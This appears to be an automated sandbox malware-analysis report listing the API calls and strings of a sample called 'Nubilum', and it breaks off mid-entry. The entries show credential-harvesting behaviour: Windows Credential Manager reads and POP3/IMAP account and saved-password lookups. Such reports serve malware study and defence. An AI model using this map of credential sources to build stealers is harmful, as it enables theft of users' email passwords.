                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                          • String ID: caption$dialog_%d$menu_%d
                          • API String ID: 3259144588-3822380221
                          • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                          • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                          • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                          • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                          APIs
                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$Library$FreeLoad
                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                          • API String ID: 2449869053-4258758744
                          • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                          • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                          • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                          • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                          APIs
                          • wcsstr.MSVCRT ref: 0040426A
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                          • _mbscpy.MSVCRT ref: 004042D5
                          • _mbscpy.MSVCRT ref: 004042E8
                          • strchr.MSVCRT ref: 004042F6
                          • strlen.MSVCRT ref: 0040430A
                          • sprintf.MSVCRT ref: 0040432B
                          • strchr.MSVCRT ref: 0040433C
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                          • String ID: %s@gmail.com$www.google.com
                          • API String ID: 3866421160-4070641962
                          • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                          • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                          • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                          • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                          • API String ID: 2360744853-2229823034
                          • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                          • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                          • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                          • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                          APIs
                          • strchr.MSVCRT ref: 004100E4
                          • _mbscpy.MSVCRT ref: 004100F2
                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                          • _mbscpy.MSVCRT ref: 00410142
                          • _mbscat.MSVCRT ref: 0041014D
                          • memset.MSVCRT ref: 00410129
                            • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                            • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                          • memset.MSVCRT ref: 00410171
                          • memcpy.MSVCRT ref: 0041018C
                          • _mbscat.MSVCRT ref: 00410197
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                          • String ID: \systemroot
                          • API String ID: 912701516-1821301763
                          • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                          • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                          • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                          • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                          APIs
                            • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                          • strchr.MSVCRT ref: 0040327B
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PrivateProfileStringstrchr
                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                          • API String ID: 1348940319-1729847305
                          • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                          • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                          • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                          • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                          • API String ID: 3510742995-3273207271
                          • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                          • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                          • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                          • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                          APIs
                          • memset.MSVCRT ref: 004094C8
                          • GetDlgCtrlID.USER32(?), ref: 004094D3
                          • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                          • memset.MSVCRT ref: 0040950C
                          • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                          • _strcmpi.MSVCRT ref: 00409531
                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                          • String ID: sysdatetimepick32
                          • API String ID: 3411445237-4169760276
                          • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                          • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                          • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                          • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                          APIs
                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                          • GetSysColor.USER32(0000000F), ref: 0040B472
                          • DeleteObject.GDI32(?), ref: 0040B4A6
                          • DeleteObject.GDI32(00000000), ref: 0040B4A9
                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: MessageSend$DeleteImageLoadObject$Color
                          • String ID:
                          • API String ID: 3642520215-0
                          • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                          • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                          • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                          • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                          APIs
                          • GetSystemMetrics.USER32(00000011), ref: 004072E7
                          • GetSystemMetrics.USER32(00000010), ref: 004072ED
                          • GetDC.USER32(00000000), ref: 004072FB
                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                          • String ID:
                          • API String ID: 1999381814-0
                          • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                          • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                          • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                          • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                          • API String ID: 1297977491-3883738016
                          • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                          • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                          • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                          • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: __aulldvrm$__aullrem
                          • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                          • API String ID: 643879872-978417875
                          • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                          • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                          • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                          • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                          APIs
                          • memset.MSVCRT ref: 0040810E
                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,7686EB20,?), ref: 004081B9
                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                          • String ID: POP3_credentials$POP3_host$POP3_name
                          • API String ID: 524865279-2190619648
                          • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                          • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                          • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                          • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ItemMenu$CountInfomemsetstrchr
                          • String ID: 0$6
                          • API String ID: 2300387033-3849865405
                          • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                          • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                          • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                          • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _mbscat$memsetsprintf
                          • String ID: %2.2X
                          • API String ID: 125969286-791839006
                          • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                          • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                          • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                          • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                          APIs
                            • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                          • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                            • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                            • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                            • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                            • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                            • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                            • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                            • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                          • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                          • CloseHandle.KERNEL32(?), ref: 00444206
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                          • String ID: ACD
                          • API String ID: 1886237854-620537770
                          • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                          • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                          • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                          • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                          APIs
                          • memset.MSVCRT ref: 004091EC
                          • sprintf.MSVCRT ref: 00409201
                            • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                            • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                            • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                          • SetWindowTextA.USER32(?,?), ref: 00409228
                          • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                          • String ID: caption$dialog_%d
                          • API String ID: 2923679083-4161923789
                          • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                          • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                          • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                          • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                          • memset.MSVCRT ref: 00410246
                          • memset.MSVCRT ref: 00410258
                            • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                          • memset.MSVCRT ref: 0041033F
                          • _mbscpy.MSVCRT ref: 00410364
                          • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                          • String ID:
                          • API String ID: 3974772901-0
                          • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                          • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                          • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                          • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                          APIs
                          • wcslen.MSVCRT ref: 0044406C
                          • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                          • strlen.MSVCRT ref: 004440D1
                            • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                            • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                          • memcpy.MSVCRT ref: 004440EB
                          • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                          • String ID:
                          • API String ID: 577244452-0
                          • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                          • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                          • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                          • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                          APIs
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          • _strcmpi.MSVCRT ref: 00404518
                          • _strcmpi.MSVCRT ref: 00404536
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
